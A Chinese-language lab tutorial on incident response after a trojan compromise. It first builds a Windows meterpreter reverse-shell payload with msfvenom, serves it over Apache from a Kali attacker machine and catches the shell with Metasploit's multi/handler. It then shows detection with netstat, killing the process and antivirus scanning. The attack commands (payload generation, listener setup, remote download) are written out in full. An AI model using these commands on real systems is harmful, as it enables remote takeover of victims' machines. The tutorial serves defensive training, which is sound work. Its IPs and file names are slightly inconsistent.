应急响应-模拟服务器挂马后的应急相关操作

工具：

攻击机：
kail:192.168.108.131
kail下载地址：https://mirrors.aliyun.com/kali-images/kali-2021.3/kali-linux-2021.3-live-i386.iso

靶机：

windows 7: 192.168.108.132

1、在kali中制作木马文件：vhost.exe，放置在kali的网站目录下：/var/www/html

msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=192.168.188.134 LPORT=9999 -b "\x00" -e x86/shikata_ga_nai -i 10 -f exe -o /var/www/html/vhosts.exe

2、开启apache服务，模拟受害者访问攻击者木马文件所在的网址，并下载木马文件

systemctl start apache2
netstat -ntpl

3、在kali上启动msf控制器，并选择相关模块，设置目标ip和端口

msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
show options
set lhost 192.168.188.134
set lport 9999

4、在攻击机执行run命令监听端口，在靶机访问攻击机IP下载木马文件

kail：run

windows 7：http://192.168.108.131/vhost.exe

5、双击运行木马文件，然后回到攻击机发现连接成功

以上步骤模拟服务器挂马操作

6、现在受害者发现自己电脑中了木马，进行应急排查

netstat -ano | more

首先执行该命令来查看电脑运行程序有哪些存在异常，这里发现有个程序连接了一个外部IP，存在是木马的嫌疑，因此需要进一步测定。

7、打开任务管理器找到该PID对应的进程，首先结束该进程。

结束该进程后，kali与靶机连接中断

8、然后找到该进程对应的程序，接着使用一些杀毒软件检测该程序是否为木马。

经检测该程序确实为木马，删除该程序即可。在该模拟中则应急结束，然而在实际情况中还需要查出漏洞点，修复该漏洞，安装杀毒软件以及防火墙后应急结束。

总结

windows木马排查方向

1、可能通过网络连接观察异常的端口或者IP通信

2、可以通过任务管理器，详细信息，找到异常文件，使用杀毒软件检测

防御：

1、开启windows 防火墙

2、安装正版杀毒软件